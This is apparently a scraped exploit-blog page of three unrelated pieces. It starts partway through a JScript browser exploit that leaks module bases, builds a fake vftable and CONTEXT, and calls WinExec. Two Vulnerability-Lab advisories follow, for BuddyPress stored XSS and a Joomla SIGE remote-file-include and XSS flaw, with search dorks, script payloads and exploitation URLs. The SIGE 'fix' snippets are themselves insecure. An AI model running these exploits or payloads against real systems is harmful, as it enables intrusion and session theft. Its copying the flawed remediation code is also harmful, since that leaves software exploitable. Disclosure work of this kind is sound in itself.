string module_lower = base.lower + function_str_offset; // Point to the string function_str_lower = read_dword(module_lower, module_upper, 0); // Get the first 4 bytes of the string res = compare_nums(target_name_first, function_str_lower); if(!res && target_name_second) { function_str_second = read_dword(module_lower + 4, module_upper, 0); // Get the next 4 bytes of the string res = compare_nums(target_name_second, function_str_second); if(!res && target_name_third) { function_str_third = read_dword(module_lower + 8, module_upper, 0); // Get the next 4 bytes of the string res = compare_nums(target_name_third, function_str_third); if(!res && target_name_fourth) { function_str_fourth = read_dword(module_lower + 12, module_upper, 0); // Get the next 4 bytes of the string res = compare_nums(target_name_fourth, function_str_fourth); } } } if(!res) { // equal module_lower = base.lower + ordinals + 2*num_pointer; ordinal = read_word(module_lower, module_upper, 0); module_lower = base.lower + addresses + 4*ordinal; function_offset = read_dword(module_lower, module_upper, 0); write_debug("[+] Found target export at offset 0x" + function_offset.toString(16)); return {'lower': base.lower + function_offset, 'upper': base.upper}; } if(res == 1) { if(upper_limit == num_pointer) { throw Error("Failed to find the target export."); } upper_limit = num_pointer; num_pointer = Math.floor((num_pointer + lower_limit) / 2); } else { if(lower_limit == num_pointer) { throw Error("Failed to find the target export."); } lower_limit = num_pointer; num_pointer = Math.floor((num_pointer + upper_limit) / 2); } if(num_pointer == upper_limit && num_pointer == lower_limit) { throw Error("Failed to find the target export."); } } throw Error("Failed to find matching export."); } // compare_nums: Compares two numbers that represent 4-byte strings for equality. If not, it detects which character is larger or smaller. function compare_nums(target, current) { // return -1 for target being greater, 0 for equal, 1 for current being greater write_debug("[*] Comparing 0x" + target.toString(16) + " and 0x" + current.toString(16)); if(target == current) { write_debug("[+] Equal!"); return 0; } while(target != 0 && current != 0) { if((target & 0xff) > (current & 0xff)) { return -1; } else if((target & 0xff) < (current & 0xff)) { return 1; } target = target >> 8; current = current >> 8; } } // generate_gadget_string: Takes a gadget address and creates a string from it. function generate_gadget_string(gadget) { return String.fromCharCode.apply(null, [gadget.lower & 0xffff, (gadget.lower >> 16) & 0xffff, gadget.upper & 0xffff, (gadget.upper >> 16) & 0xffff]); } // generate_obj_vftable: Creates a fake object with a fake vftable containing a few ROP gadgets. function generate_obj_vftable(initial_jmp) { trigger_obj = Array(pad_size + 1).join('A'); // Adds lots of stack space to either side to prevent msvcrt.dll crashing trigger_obj = trigger_obj + Array(157).join('A') + generate_gadget_string(initial_jmp); trigger_obj = trigger_obj.substr(0, trigger_obj.length); trigger_addr = string_addr(trigger_obj); write_debug("[+] Trigger object at 0x" + trigger_addr.upper.toString(16) + " 0x" + trigger_addr.lower.toString(16)); return trigger_addr; } // generate_context: Creates a partial fake CONTEXT structure to use with NtContinue. P1Home and P2Home are missing because this structure is a part of the fake object. This means that no stack pivot is needed for execution of this exploit. The leaked stack pointer is also used to protect against stack pivot detection. function generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export) { return "\u0000\u0000\u0000\u0000" + // P3Home "\u0000\u0000\u0000\u0000" + // P4Home "\u0000\u0000\u0000\u0000" + // P5Home "\u0000\u0000\u0000\u0000" + // P6Home "\u0003\u0010" + // ContextFlags "\u0000\u0000" + // MxCsr "\u0033" + // SegCs "\u0000" + // SegDs "\u0000" + // SegEs "\u0000" + // SegFs "\u0000" + // SegGs "\u002b" + // SegSs "\u0246\u0000" + // EFlags "\u0000\u0000\u0000\u0000" + // Dr0 - Prevents EAF too! "\u0000\u0000\u0000\u0000" + // Dr1 "\u0000\u0000\u0000\u0000" + // Dr2 "\u0000\u0000\u0000\u0000" + // Dr3 "\u0000\u0000\u0000\u0000" + // Dr6 "\u0000\u0000\u0000\u0000" + // Dr7 "\u0000\u0000\u0000\u0000" + // Rax generate_gadget_string(command_address) + // Rcx - Command pointer "\u0000\u0000\u0000\u0000" + // Rdx - SW_HIDE "\u0000\u0000\u0000\u0000" + // Rbx generate_gadget_string(leaked_stack_ptr) + // Rsp - Leaked Stack pointer "\u0000\u0000\u0000\u0000" + // Rbp "\u0000\u0000\u0000\u0000" + // Rsi "\u0000\u0000\u0000\u0000" + // Rdi "\u0040\u0000\u0000\u0000" + // R8 "\u0000\u0000\u0000\u0000" + // R9 "\u0000\u0000\u0000\u0000" + // R10 "\u0000\u0000\u0000\u0000" + // R11 "\u0000\u0000\u0000\u0000" + // R12 "\u0000\u0000\u0000\u0000" + // R13 "\u0000\u0000\u0000\u0000" + // R14 "\u0000\u0000\u0000\u0000" + // R15 generate_gadget_string(kernel32_winexec_export); // Rip - WinExec() call } // trigger_exec: Triggers code execution by creating a fake VAR of type 0x81, setting it's vftable to the payload, and causing execution by using typeof. function trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export) { rewrite(make_variant(0x81, leak_lower + 96, 0) + make_variant(0, obj_addr.lower + 2 * (pad_size), 0) + generate_context(command_address, leaked_stack_ptr, kernel32_winexec_export)); write_debug("[*] About to trigger..."); typeof fakeobj_var; } // leak_stack_ptr: Leaks a stack pointer in order to avoid stack pivot detection in the CONTEXT structure. function leak_stack_ptr() { leak_obj = new Object(); // Create an object obj_addr = addrof(leak_obj); // Get address csession_addr = read_dword(obj_addr + 24, 0, 1); // Get CSession from offset 24 stack_addr_lower = read_dword(csession_addr + 80, 0, 1); // Get the lower half of the stack pointer from offset 80 stack_addr_upper = read_dword(csession_addr + 84, 0, 1); // Get the upper half of the stack pointer from offset 84 return {'lower': stack_addr_lower, 'upper': stack_addr_upper}; } // string_addr: Gets the address of a string in an object that can be used in a chain. function string_addr(string_to_get) { return {'lower': addrof(string_to_get), 'upper': 0}; } // main: The entire exploit. function main(){ // Setup functions lfh_trigger(); // Trigger LFH - May or may not make the exploit more reliable, but can't hurt // Leak VAR leak_var(); // Identify offset for reliable rewrite get_rewrite_offset(); // Test rewrite test_rewrite(); // Create a fake VAR get_fakeobj(); // Test fakeobj rewrite test_fakeobj(); // Output results so far write_debug("[+] Leaked address 0x" + leak_lower.toString(16) + " is at offset " + leak_offset); // Test read test_read(); // Get the module base for jscript jscript_base = leak_jscript_base(); // Get the msvcrt base by following the jscript import table mscvcrt_leak = leak_module(jscript_base, 0x6376736d, 0x642e7472); msvcrt_base = find_module_base(mscvcrt_leak); write_debug("[+] Found msvcrt base at 0x" + msvcrt_base.upper.toString(16) + " 0x" + msvcrt_base.lower.toString(16)); // Get the ntdll base by following the msvcrt import table ntdll_leak = leak_module(msvcrt_base, 0x6c64746e, 0x6c642e6c); ntdll_base = find_module_base(ntdll_leak); write_debug("[+] Found ntdll at 0x" + ntdll_base.upper.toString(16) + " 0x" + ntdll_base.lower.toString(16)); // Get the kernel32 base by following the jscript import table kernel32_leak = leak_module(jscript_base, 0x4e52454b, 0x32334c45); kernel32_base = find_module_base(kernel32_leak); write_debug("[+] Found kernel32 at 0x" + kernel32_base.upper.toString(16) + " 0x" + kernel32_base.lower.toString(16)); // Find the WinExec function address from kernel32 kernel32_winexec_export = leak_export(kernel32_base, 0x456e6957, 0, 0, 0); write_debug("[+] Found WinExec at 0x" + kernel32_winexec_export.upper.toString(16) + " 0x" + kernel32_winexec_export.lower.toString(16)); // Find the NtContinue function address from ntdll ntdll_ntcontinue_export = leak_export(ntdll_base, 0x6f43744e, 0x6e69746e, 0, 0); write_debug("[+] Found NtContinue at 0x" + ntdll_ntcontinue_export.upper.toString(16) + " 0x" + ntdll_ntcontinue_export.lower.toString(16)); // Get the address of the command to be executed command_address = string_addr(command); // Leak the stack pointer leaked_stack_ptr = leak_stack_ptr(); // Create fake object and vftable obj_addr = generate_obj_vftable(ntdll_ntcontinue_export); // Generate context and trigger code execution trigger_exec(obj_addr, command_address, leaked_stack_ptr, kernel32_winexec_export); } // Call main() main(); </script> </head> </html>
  24. HireHackking

    WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Buddypress 6.2.0 - Persistent Cross-Site Scripting # Exploit Author: Vulnerability-Lab # Date: 2020-11-13 # Vendor Homepage: https://wordpress.org/plugins/buddypress/ # Version: 6.2.0 Document Title: =============== Buddypress v6.2.0 WP Plugin - Persistent Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2263 Release Date: ============= 2020-11-13 Vulnerability Laboratory ID (VL-ID): ==================================== 2263 Common Vulnerability Scoring System: ==================================== 4.2 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Are you looking for modern, robust, and sophisticated social network software? BuddyPress is a suite of components that are common to a typical social network, and allows for great add-on features through WordPress’s extensive plugin system. Aimed at site builders & developers, BuddyPress is focused on ease of integration, ease of use, and extensibility. It is deliberately powerful yet unbelievably simple social network software, built by contributors to WordPress. (Copy of the Homepage: https://wordpress.org/plugins/buddypress/ & https://buddypress.org/download/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent xss web vulnerability in the Buddypress v6.2.0 plugin for wordpress. Affected Product(s): ==================== Buddypress Product: Buddypress v6.0.0 - v6.2.0 (Wordpress Plugin) Vulnerability Disclosure Timeline: ================================== 2020-11-13: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Moderator Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the Buddypress v6.0.0 - v6.2.0 plugin for wordpress. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `wp:html` name parameter of the `figure` content. Remote attackers with privileges are able to inject own malicious persistent script code as input to compromise the internal ui of the wordpress backend. The attacker injects his code and in case the admin or other privileged user account previews the content the code simple executes. The request method to inject is POST and the attack vector is located on the application-side. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] wp:html Vulnerable Parameter(s): [+] figure Affected Module(s): [+] page_id=x&preview=true Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by remote attackers with privilged user accounts without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Inject https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit PoC: Execute https://test23.localhost:8000/?page_id=6 https://test23.localhost:8000/?page_id=6&preview=true PoC: Vulnerable Source <div id="content" class="site-content"> <div class="wrap"> <div id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <article id="post-6" class="post-6 page type-page status-draft hentry"> <header class="entry-header"> <h1 class="entry-title">Mitglieder</h1><span class="edit-link"> <a class="post-edit-link" href="https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit"> <span class="screen-reader-text">„Mitglieder“</span> bearbeiten</a></span> </header><!-- .entry-header --> <div class="entry-content"> <p></p> <div class="wp-block-group"><div class="wp-block-group__inner-container"> <div class="wp-block-group"><div class="wp-block-group__inner-container"></div></div> </div></div> <figure><iframe src="evil.source" onload="alert(document.cookie)"></iframe></figure> </div><!-- .entry-content --> </article><!-- #post-6 --> </main><!-- #main --> </div><!-- #primary --> </div><!-- .wrap --> </div> --- PoC Session Logs (POST) --- https://test23.localhost:8000/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F6&_locale=user Host: test23.localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: application/json, */*;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://test23.localhost:8000/wp-admin/post.php?post=6&action=edit X-WP-Nonce: 04a953e188 X-HTTP-Method-Override: PUT Content-Type: application/json Origin: https://test23.localhost:8000 Content-Length: 614 Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE= Connection: keep-alive Cookie: g3sid=bdbf56f2335bbce0720f03ed25343b66db61b54a%7E6a5nrndvh14i5kb09tfrl7afe2; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_55a3fb1cb724d159a111224c7f110400=admin_f507c7w4%7C1589912472%7CxTSn77nlwpdxYR8NUaJOXfQM9ShaBlSLzP7Anix xNt8%7C557ca2874863d9f1f6a8316659798e11558a01ffc8671eea68d496aa5df99b17; wp-settings-time-1=1589740723 {"id":6,"content":"<!-- wp:paragraph -->n<p></p>n<!-- /wp:paragraph -->nn<!-- wp:group -->n<div class="wp-block-group"> <div class="wp-block-group__inner-container"><!-- wp:group -->n<div class="wp-block-group"><div class="wp-block-group__inner-container"> <!-- wp:block {"ref":"reusable1"} /--></div></div>n<!-- /wp:group --></div></div>n<!-- /wp:group -->nn <!-- wp:block {"ref":"reusable1"} /-->nn<!-- wp:block {"ref":"reusable1"} /-->nn <!-- wp:html -->n<figure><iframe src="evil.source" onload="alert(document.cookie)"></iframe></figure>n<!-- /wp:html -->nn<!-- wp:bp/member /-->"} - POST: HTTP/1.1 200 OK Cache-Control: no-cache, must-revalidate, max-age=0 Allow: GET, POST, PUT, PATCH, DELETE Content-Type: application/json; charset=UTF-8 Vary: Origin Server: Microsoft-IIS/8.5 X-Robots-Tag: noindex Link: <https://test23.localhost:8000/index.php?rest_route=/>; rel="https://api.w.org/" Content-Length: 3108 References: https://test23.localhost:8000/index.php https://test23.localhost:8000/wp-admin/post.php Security Risk: ============== The security risk of the persistent input validation web vulnerability in the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
  25. HireHackking

    Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities # Exploit Author: Vulnerability-Lab # Date: 2020-11-11 # Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended # Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended # Version: 3.5.3 Document Title: =============== SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2265 Release Date: ============= 2020-11-11 Vulnerability Laboratory ID (VL-ID): ==================================== 2265 Common Vulnerability Scoring System: ==================================== 7.8 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 2.000€ - 3.000€ Product & Service Introduction: =============================== It offers numerous opportunities to present pictures quickly and easily in articles. The unique feature of the plugin is that you can control any parameter on the syntax call. Editor Button - SIGE Parameters: With the button, you can set the parameters very easy on-the-fly in an article. It is an excellent addition to SIGE. Highlights are: parameter call, watermark function, read IPTC data, thumbnail storage, crop function, sort by modification date, output as a list, CSS Image Tooltip, Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was rewritten entirely and equipped with numerous innovations. The absolute highlight is the turbo mode. This feature doesn't exist in any other plugin for Joomla!. In Turbo Mode 2 text files are created from the HTML output of the gallery and loaded in successive runs. This feature eliminates the tedious editing process of each image. In a test with 50 large images, the creation of a gallery with all the extra features (save thumbnails, watermark generation, resize original images, etc.) without turbo mode lasted approximately 17 seconds. In turbo mode, it only took 1 second, and the gallery on the same scale was available! For calling the syntaxes, additionally, an Editor Button has been programmed. It makes it very easy to choose the required syntax, showing all the settings and parameters of the plugin. It is a great enrichment in using the SIGE plugin. (Copy of the Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended ) (Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ; https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ; https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered multiple web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla. Affected Product(s): ==================== Vendor: Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro - Joomla Extension (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-11-10: Researcher Notification & Coordination (Security Researcher) 2020-11-11: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== High Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ 1.1 A file include vulnerability has been discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla. The web vulnerability allows remote attackers to unauthorized upload web-shells or malicious contents to compromise the local file-system. The vulnerability is located in the img parameter of the print.php file. Remote attackers are able to upload images to the unrestricted assets path to compromise the web-applications file-system and involved database management system. Exploitation requires no user interaction and only a low privileged user account to upload images. 1.2 Multiple non-persistent cross site web vulnerabilities has been discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the client-side. The non-persistent cross site scripting web vulnerabilities are located in the `name` and `title` parameters of the `print.php` file. Remote attackers without user or guest privileges are able to make own malicious special crafted links to compromise client-side GET method requests. The attack vector is non-persistent and the issue affects the client-side. Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent client-side manipulation of affected application modules. Proof of Concept (PoC): ======================= 1.1 The remote file include web vulnerability can be exploited by remote attackers without privileged user account or user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Dork(s): intext:"Powered by Simple Image Gallery Extended" intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" PoC: Exploitation http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI VULNERABILITY!]&name=[NAME]%20title=[TITLE] 1.2 The non-persistent cross site scripting web vulnerability can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. Dork(s): intext:"Powered by Simple Image Gallery Extended" intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" PoC: Payload "><svg onload=alert()> '><script>alert('');</script> <IMG "'"><script>alert()</script>'> PoC: Example http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE] http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT XSS] PoC: Exploitation http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php ?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E Solution - Fix & Patch: ======================= 1.1 The remote file include vulnerability issue can be resolved by the following steps ... Example : ?php $files=array('test.gif'); if(in_array($_GET['file'], $files)){ include ($_GET['file']); } ? * If you are a server administrator, turn off allow_url_fopen from the file * Or do it with the ini_set command. Only for (RFI) ?php ini_set('allow_url_fopen ', 'Off'); ? * We can use the strpos command to check that if the address is: // http, the file will not be enclosed ?php $strpos = strpos($_GET['url'],'http://'); if(!$strpos){ include($_GET['url']); } ? * Using str_replace we can give the given address from two characters "/", "." Let's clean up ?php $url=$_GET['url']; $url = str_replace("/", "", $url); $url = str_replace(".", "", $url); include($url); ? 1.2 The client-side cross site scripting vulnerabilities can be resolved by the following steps ... 1. Encode and escape as parse the name and title parameters 2. Filter the input for special chars and disallow them in parameters Security Risk: ============== 1.1 The securit risk of the remote file include vulnerability in the img path of the web-application request is estimated as high. 1.2 The security risk of the non-persistent cross site scripting vulnerabilities is estimated as medium. Credits & Authors: ================== h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com